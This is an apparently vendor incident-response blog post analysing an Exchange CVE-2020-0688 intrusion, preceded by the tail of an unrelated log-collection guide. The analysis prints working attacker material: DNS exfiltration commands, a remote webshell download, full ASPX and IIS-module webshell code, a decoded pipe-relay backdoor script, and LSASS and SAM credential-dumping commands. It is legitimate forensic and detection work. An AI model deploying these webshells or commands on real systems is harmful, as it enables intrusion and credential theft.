  4. ...after your typespec is copied (and modified as necessary), restart the source-server on the Node0/Admin Server
  5. ...now open the NetWitness UI and navigate to Admin/Endpoint Sources and create a new (or modify an existing) Agent File Logs policy (more details and instructions on that here: Endpoint Config: About Endpoint Sources)
    1. ...find your custom Flat File log source in the dropdown and add it to the Endpoint Policy
    2. ...modify the Log File Path, if necessary:
    3. ...then simply publish your newly modified policy
  6. ...and once you have confirmed Collection via the Endpoint Agent, you can stop the SFTP agent on the log source (https://community.rsa.com/docs/DOC-101743#Replace)

 

And that's it.  Happy logging.

Abstract

 

In this blog I describe a recent intrusion that started with the exploitation of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. For this exploit to work, an authenticated account is needed to make requests against the Exchange Control Panel (ECP). Some organizations may still not have patched this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" in delaying this patch could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email or via a simple dictionary attack against the Exchange server. Details on the technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms that are native to the NetWitness Platform that will alert your organization to such activity.

 

Exchange Exploit - CVE-2020-0688

 

The first sign of the exploit appeared on 26 February 2020. The attacker leveraged the credentials of an account they had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to a poor password policy, or by preceding the exploit with a credential harvesting attack. Once at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.

 

IIS log entry of exploit code

 

The following Cyberchef recipe helps us decode the highlighted exploit code:

https://gchq.github.io/CyberChef/#recipe=URL_Decode()From_Base64('A-Za-z0-9%2B/%3D',true)
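The same two-step decode can also be reproduced outside of CyberChef, for example with a few lines of Python. The sample value below is a placeholder (URL-encoded Base64 of a harmless command), not a value taken from this incident's logs:

import base64
from urllib.parse import unquote

def decode_exploit_param(logged_value: str) -> bytes:
    """Apply the same two steps as the CyberChef recipe: URL decode, then Base64 decode."""
    return base64.b64decode(unquote(logged_value))

# Placeholder input for illustration only (URL-encoded Base64 of "cmd /c whoami").
sample = "Y21kIC9jIHdob2FtaQ%3D%3D"
print(decode_exploit_param(sample))   # b'cmd /c whoami'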

 

The highlighted encoded data above decodes to the following where we see the attacker attempt to echo the string 'flogon' into a file named flogon2.js in one of the public facing Exchange folders:

 

Decoded exploit command

 

The attacker performed two more exploit success checks by launching an ftp command to anonymously log in to IP address 185.25.51.71, followed by a ping request to a Burp Collaborator domain:

 

Exploit-success checks

 

The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to IP address 185.25.51.71 to ensure that the server was still exploitable. These were followed up by commands to write simple strings into files in the Exchange directories, as shown below:

 

Exploit success checks

 

The attacker also attempted to create a local user account named “public” with the password “Asp-=14789” via the exploit, and attempted to add this account to the local administrators group. Both of these actions failed.

 

Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add

   

The attacker issued several ping requests to subdomains under zhack.ca, which is a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what enables the sending of data to the attacker. Again, the attacker appears to have been trying to see if the exploit commands were successful, and these DNS requests would have confirmed the success of the exploit commands.

 

Here is what the attacker would have seen if the requests were successful:

 

DNSBin RSA test

 

Here are some of the generic domain names the attacker tried:

 

zhack.ca pings
ping –n 1 asd.ddb8d339493dc0834c6f.d.zhack.ca
ping –n 1 mydatahere.9234b19e99d260b486b5.d.zhack.ca
ping –n 1 asasdd.ddb8d339493dc0834c6f.d.zhack.ca

 

After confirming that the DNS requests were being made, the attacker then started concatenating the output of Powershell commands to these DNS requests in order to see the result of the commands. It is worth mentioning here that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker did not have a way to see the results of such attempts. Hence, initially the attacker wrote some output to files as shown above (such as flogon2.txt), or in this case sending the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:

 

Concatenating Powershell command results to DNS queries

 

powershell Resolve-DnsName((test-netconnection google.com -port 443 -informationlevel quiet).toString()+'.1.0d7a5e6cf01310fe3fd5.d.zhack.ca')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'.2.0d7a5e6cf01310fe3fd5.d.zhack.ca')

 

These types of requests would have confirmed that the server was allowed to connect outbound to the Internet (by being able to reach google.com), tested the existence of the specified path, and sent the hostname to the attacker.

 

Exploit command output exfiled via DNS
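From a detection standpoint, the long, random-looking labels that this technique produces tend to stand out in DNS logs (or in the alias.host meta for the corresponding sessions). Here is a minimal, hedged sketch of that idea in Python; the length and entropy thresholds are arbitrary illustrations, and the sample queries are taken from the ping commands shown earlier plus a benign name for contrast:

import math
from collections import Counter

def entropy(s: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_like_dns_exfil(query: str, min_label_len: int = 16, min_entropy: float = 3.0) -> bool:
    """Flag queries containing an unusually long, random-looking label (candidate encoded data)."""
    # Thresholds are arbitrary illustrations; tune them for your environment.
    return any(len(label) >= min_label_len and entropy(label) >= min_entropy
               for label in query.split("."))

# Sample queries taken from the ping commands shown earlier, plus a benign name.
queries = [
    "asd.ddb8d339493dc0834c6f.d.zhack.ca",
    "mydatahere.9234b19e99d260b486b5.d.zhack.ca",
    "www.google.com",
]
for q in queries:
    print(q, looks_like_dns_exfil(q))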

 

Entrenchment

 

Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted at pastebin into this directory under a file named OutlookDN.aspx (I am redacting the full pastebin link to prevent the hijacking of such webshells on other potential victims by other actors, since the webshell is password protected):

 

Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('http://pastebin.com/raw/**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')

 

The webshell code downloaded from pastebin is shown below:

 

Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
Process p = new Process();
p.StartInfo.FileName = "cmd";
p.StartInfo.Arguments = "/c " + cmd.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.Start();
Response.Write("<pre>\r\n"+p.StandardOutput.ReadToEnd() +"\r\n</pre>");
p.Close();
}
protected void Page_Load(object sender, EventArgs e)
{
if (Request.Params["pw"]!="*******REDACTED********") Response.End();
}
</script>

 

At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:

 

Webshell 2
powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is shown below. It writes a file to the path supplied in the "p" request parameter, with its contents taken from the Base64-decoded "c" cookie value, giving the attacker an arbitrary file upload capability:

 

<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>

 

At this point the attacker performed some of the most common activities seen during the early stages of a compromise: credential harvesting, user and group lookups, some pings, and directory traversals.

 

The credential harvesting consisted of several common techniques:

 

Credential harvesting related activity

Used Sysinternals' ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes. 

These files were then placed on public facing exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"

 

In addition to the traditional ASPX type webshells, the attacker introduced another type of webshell onto the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to set up this new backdoor:

 

C:\windows\temp\System.Web.TransportClient.dll
C:\windows\temp\tmp.ps1

 

File System.Web.TransportClient.dll is the webshell, whereas file tmp.ps1 is a script to register the DLL with IIS. The contents of this script are shown below:

 

[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$publish.GacInstall($name)
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"

 

The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):

 

using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;
namespace System.Web.TransportClient
{
public class TransportHandlerModule : IHttpModule
{
public void Init(HttpApplication application)
{
application.BeginRequest += new EventHandler(this.Application_EndRequest);
}
private void Application_EndRequest(object source, EventArgs e)
{
HttpContext context = ((HttpApplication) source).Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string keyString = "kByTsFZq********nTzuZDVs********";
string cipherData1 = request.Params[keyString.Substring(0, 8)];
string cipherData2 = request.Params[keyString.Substring(16, 8)];
if (cipherData1 != null)
{
response.ContentType = "text/plain";
string plain;
try
{
string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) : TransportHandlerModule.run(command);
}
catch (Exception ex)
{
plain = "error:" + ex.Message + " " + ex.StackTrace;
}
response.Write(TransportHandlerModule.Encrypt(plain, keyString));
response.End();
}
else
context.Response.DisableKernelCache();
}
private static string Encrypt(string plain, string keyString)
{
byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
byte[] salt = new byte[10]
{
(byte) 1,
(byte) 2,
(byte) 23,
(byte) 234,
(byte) 37,
(byte) 48,
(byte) 134,
(byte) 63,
(byte) 248,
(byte) 4
};
byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes1;
rijndaelManaged1.IV = bytes2;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
{
using (MemoryStream memoryStream = new MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
{
byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
memoryStream.Write(bytes2, 0, bytes2.Length);
cryptoStream.Write(bytes3, 0, bytes3.Length);
cryptoStream.Close();
return Convert.ToBase64String(memoryStream.ToArray());
}
}
}
}
private static string Decrypt(string cipherData, string keyString)
{
byte[] bytes = Encoding.UTF8.GetBytes(keyString);
byte[] buffer = Convert.FromBase64String(cipherData);
byte[] rgbIV = new byte[16];
Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes;
rijndaelManaged1.IV = rgbIV;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
{
using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
return new StreamReader((Stream) cryptoStream).ReadToEnd();
}
}
}
private static string run(string command)
{
string str = "/c " + command;
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = str;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
return process.StandardOutput.ReadToEnd();
}
private static string Client(string command, string path)
{
string pipeName = "splsvc";
string serverName = ".";
Console.WriteLine("sending to : " + serverName + ", path = " + path);
using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
{
pipeClientStream.Connect(1500);
StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
streamWriter.WriteLine(path);
streamWriter.WriteLine(command);
streamWriter.WriteLine("**end**");
streamWriter.Flush();
return new StreamReader((Stream) pipeClientStream).ReadToEnd();
}
}
public void Dispose()
{
}
}
}

 

The registered DLL shows up in the IIS Modules as TransportModule:

 

IIS Module Installation

 

This DLL webshell is capable of executing commands directly via cmd.exe, or of sending the command to a pipe named splsvc. In this setup, the DLL acts as the pipe client, i.e. it sends data to the named pipe. In order to set up the other side of the pipe (i.e. the server side), the attacker executed this command:

 

cmd.exe /c WMIC /node:"." process call create "powershell -enc
JABzAGMAcgBpAHAAdAAgAD0AIAB7AAoACQAkAHAAaQBwAGUATgBhAG0AZQAgAD0AIAAnAHMAcABsAHMAdgBjACcACgAJACQAYwBtAGQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBoAGEAbgBkAGwAZQAgAD0AIAAkAHAAaQBkACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYwBvAG0AbQBhAG4AZABsAGkAbgBlAAoACQAkAGwAaQBzAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AZQBxACAAJABjAG0AZAAgAC0AYQBuAGQAIAAkAF8ALgBIAGEAbgBkAGwAZQAgAC0AbgBlACAAJABwAGkAZAB9ACAACgAJAGkAZgAgACgAJABsAGkAcwB0AC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAApACAAewAKAAkACQAkAGwAaQBzAHQAIAB8ACAAZgBvAHIAZQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAALQBwAHIAbwBjAGUAcwBzACAAewBzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABfAC4ASABhAG4AZABsAGUAfQAKAAkAfQAKAAkAZgB1AG4AYwB0AGkAbwBuACAAaABhAG4AZABsAGUAQwBvAG0AbQBhAG4AZAAoACkAIAB7AAoACQAJAHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAIAB7AAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAYwByAGUAYQB0AGUAIABwAGkAcABlACAAcwBlAHIAdgBlAHIAIgAKAAkACQAJACQAcwBpAGQAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBTAGUAYwB1AHIAaQB0AHkASQBkAGUAbgB0AGkAZgBpAGUAcgAoAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAZQBsAGwASwBuAG8AdwBuAFMAaQBkAFQAeQBwAGUAXQA6ADoAVwBvAHIAbABkAFMAaQBkACwAIAAkAE4AdQBsAGwAKQAKAAkACQAJACQAUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABpAHAAZQBzAC4AUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkACgAJAAkACQAkAEEAYwBjAGUAcwBzAFIAdQBsAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABpAHAAZQBzAC4AUABpAHAAZQBBAGMAYwBlAHMAcwBSAHUAbABlACgAIgBFAHYAZQByAHkAbwBuAGUAIgAsACAAIgBGAHUAbABsAEMAbwBuAHQAcgBvAGwAIgAsACAAIgBBAGwAbABvAHcAIgApAAoACQAJAAkAJABQAGkAcABlAFMAZQBjAHUAcgBpAHQAeQAuAFMAZQB0AEEAYwBjAGUAcwBzAFIAdQBsAGUAKAAkAEEAYwBjAGUAcwBzAFIAdQBsAGUAKQAKAAkACQAJACQAcABpAHAAZQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBTAGUAcgB2AGUAcgBTAHQAcgBlAGEAbQAgACQAcABpAHAAZQBOAGEAbQBlACwAIAAnAEkAbgBPAHUAdAAnACwAIAA2ADAALAAgACcAQgB5AHQAZQAnACwAIAAnAE4AbwBuAGUAJwAsACAAMwAyADcANgA4ACwAIAAzADIANwA2ADgALAAgACQAUABpAHAAZQBTAGUAYwB1AHIAaQB0AHkACgAJAAkACQAjACQAcABpAHAAZQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBTAGUAcgB2AGUAcgBTAHQAcgBlAGEAbQAgACQAcABpAHAAZQBOAGEAbQBlACwAIAAnAEkAbgBPAHUAdAAnACwAIAA2ADAACgAJAAkACQAkAHAAaQBwAGUALgBXAGEAaQB0AEYAbwByAEMAbwBuAG4AZQBjAHQAaQBvAG4AKAApAAoACQAJAAkAJAByAGUAYQBkAGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAcABpAHAAZQApADsACgAJAAkACQAkAHcAcgBpAHQAZQByACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJABwAGkAcABlACkAOwAKAAoACQAJAAkAJABwAGEAdABoACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEwAaQBuAGUAKAApADsACgAJAAkACQAkAGQAYQB0AGEAIAA9ACAAJwAnACAACgAJAAkACQB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApACAAewAKAAkACQAJAAkAJABsAGkAbgBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEwAaQBuAGUAKAApAAoACQAJAAkACQBpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJwAqACoAZQBuAGQAKgAqACcAKQAgAHsACgAJAAkACQAJAAkAYgByAGUAYQBrAAoACQAJAAkACQB9AAoACQAJAAkACQAkAGQAYQB0AGEAIAArAD0AIAAkAGwAaQBuAGUAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQAKAAkACQAJAH0ACgAJAAkACQB3AHIAaQB0AGUALQBoAG8AcwB0ACAAJABwAGEAdABoAAoACQAJAAkAdwByAGkAdABlAC0AaABvAHMAdAAgACQAZABhAHQAYQAKAAkACQAJAHQAcgB
5ACAAewAKAAkACQAJAAkAJABwAGEAcgB0AHMAIAA9ACAAJABwAGEAdABoAC4AUwBwAGwAaQB0ACgAJwA6ACcAKQAKAAkACQAJAAkAJABpAG4AZABlAHgAIAA9ACAAWwBpAG4AdABdADoAOgBQAGEAcgBzAGUAKAAkAHAAYQByAHQAcwBbADAAXQApAAoACQAJAAkACQBpAGYAIAAoACQAaQBuAGQAZQB4ACAAKwAgADEAIAAtAGUAcQAgACQAcABhAHIAdABzAC4ATABlAG4AZwB0AGgAKQAgAHsACgAJAAkACQAJAAkAJAByAGUAdAB2AGEAbAAgAD0AIABpAGUAeAAgACQAZABhAHQAYQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnAAoACQAJAAkACQB9ACAAZQBsAHMAZQAgAHsACgAJAAkACQAJAAkAJABwAGEAcgB0AHMAWwAwAF0AIAA9ACAAKAAkAGkAbgBkAGUAeAAgACsAIAAxACkALgBUAG8AUwB0AHIAaQBuAGcAKAApAAoACQAJAAkACQAJACQAbgBlAHcAUABhAHQAaAAgAD0AIAAkAHAAYQByAHQAcwAgAC0AagBvAGkAbgAgACcAOgAnAAoACQAJAAkACQAJACQAcgBlAHQAdgBhAGwAIAA9ACAAcwBlAG4AZAAgACQAcABhAHIAdABzAFsAJABpAG4AZABlAHgAIAArACAAMQBdACAAJABuAGUAdwBQAGEAdABoACAAJABkAGEAdABhAAoACQAJAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAHMAZQBuAGQAIAB0AG8AIABuAGUAeAB0ACcAIAArACAAJAByAGUAdAB2AGEAbAAKAAkACQAJAAkAfQAKAAkACQAJAH0AIABjAGEAdABjAGgAIAB7AAoACQAJAAkACQAkAHIAZQB0AHYAYQBsACAAPQAgACcAZQByAHIAbwByADoAJwAgACsAIAAkAGUAbgB2ADoAYwBvAG0AcAB1AHQAZQByAG4AYQBtAGUAIAArACAAJwA+ACcAIAArACAAJABwAGEAdABoACAAKwAgACcAPgAgACcAIAArACAAJABFAHIAcgBvAHIAWwAwAF0ALgBUAG8AUwB0AHIAaQBuAGcAKAApAAoACQAJAAkAfQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHIAZQB0AHYAYQBsAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQBMAGkAbgBlACgAJAByAGUAdAB2AGEAbAApAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEYAbAB1AHMAaAAoACkACgAJAAkACQAkAHcAcgBpAHQAZQByAC4AQwBsAG8AcwBlACgAKQAKAAkACQB9AAoACQB9AAoACQBmAHUAbgBjAHQAaQBvAG4AIABzAGUAbgBkACgAJABuAGUAeAB0ACwAIAAkAHAAYQB0AGgALAAgACQAZABhAHQAYQApACAAewAKAAkACQB3AHIAaQB0AGUALQBoAG8AcwB0ACAAJwBuAGUAeAB0ACcAIAArACAAJABuAGUAeAB0AAoACQAJAHcAcgBpAHQAZQAtAGgAbwBzAHQAIAAkAHAAYQB0AGgACgAJAAkAJABjAGwAaQBlAG4AdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGkAcABlAHMALgBOAGEAbQBlAGQAUABpAHAAZQBDAGwAaQBlAG4AdABTAHQAcgBlAGEAbQAgACQAbgBlAHgAdAAsACAAJABwAGkAcABlAE4AYQBtAGUALAAgACcASQBuAE8AdQB0ACcALAAgACcATgBvAG4AZQAnACwAIAAnAEEAbgBvAG4AeQBtAG8AdQBzACcACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAKAAxADAAMAAwACkACgAJAAkAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAYwBsAGkAZQBuAHQAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAHAAYQB0AGgAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAGQAYQB0AGEAKQAKAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAnACoAKgBlAG4AZAAqACoAJwApAAoACQAJACQAdwByAGkAdABlAHIALgBGAGwAdQBzAGgAKAApAAoACQAJACQAcgBlAGEAZABlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAGMAbABpAGUAbgB0ACkAOwAKAAkACQAkAHIAZQBzAHAAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKAAkACQAkAHIAZQBzAHAACgAJAH0ACgAJACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAHQAbwBwACcACgAJAGgAYQBuAGQAbABlAEMAbwBtAG0AYQBuAGQACgB9AAoASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAkAHMAYwByAGkAcAB0AAoA

 

The encoded data in the Powershell command decodes to this script, which sets up the pipe server:

 

$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     }
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $PipeSecurity.SetAccessRule($AccessRule)
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $pipe.WaitForConnection()
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                         break
                    }
                    $data += $line + [Environment]::NewLine
               }
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
                    }
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               }
               Write-Host $retval
               $writer.WriteLine($retval)
               $writer.Flush()
               $writer.Close()
          }
     }
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $client.Connect(1000)
          $writer = new-object System.IO.StreamWriter($client)
          $writer.WriteLine($path)
          $writer.WriteLine($data)
          $writer.WriteLine('**end**')
          $writer.Flush()
          $reader = new-object System.IO.StreamReader($client);
          $resp = $reader.ReadToEnd()
          $resp
     }
     $ErrorActionPreference = 'Stop'
     handleCommand
}
Invoke-Command -ScriptBlock $script

 

From an EDR perspective, the interesting aspect of this type of webshell is that, other than the command that sets up the pipe server (which is executed via the w3wp.exe process), the rest of the commands are executed by the PowerShell process running the pipe server, even though the commands still arrive through the w3wp.exe process. In fact, once the attacker set up this type of webshell in this intrusion, they deleted all of the initial ASPX-based webshells.

 

Webshell interaction

 

Although during this incident the pipe webshell was only used on the Exchange server itself, it is possible to chain several of these pipe servers together and relay commands to other internal hosts, as the send function in the decoded script above suggests.

 

Webshell Data Decryption

 

In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Let's break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:

 

Request
POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close
kByTsFZq=t52oDnptrTkTGLPlNYi6U2crOvyn5KhAC2MJegqJ2s5396NZ9ZFqEuN2RHAaaqePvgKuQ7X
